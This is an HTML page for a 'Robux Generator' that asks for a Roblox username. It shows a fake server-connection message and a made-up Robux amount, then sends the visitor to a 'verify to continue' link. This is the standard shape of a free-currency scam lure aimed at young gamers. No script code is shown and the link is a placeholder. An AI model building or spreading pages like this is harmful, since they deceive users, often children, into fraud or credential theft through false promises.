
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Robux Generator</title>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <div class="container">
    <h1>Robux Generator</h1>
    <input type="text" id="username" placeholder="Enter your Roblox username" />
    <button onclick="generate()">Generate Robux</button>
    <div id="loading" style="display: none;">
      <p>🔄 Loading... Connecting to Roblox servers...</p>
    </div>
    <div id="result" style="display: none;">
      <p>✅ Username Found: <span id="userOutput"></span></p>
      <p>💰 Amount: <span id="robuxOutput"></span> Robux</p>
      <p>⚠️ Due to high traffic, please verify to continue:</p>
      <a id="verifyLink" href="#" target="_blank">Click here to verify</a>
    </div>
  </div>
  <script src="script.js"></script>
</body>
</html>
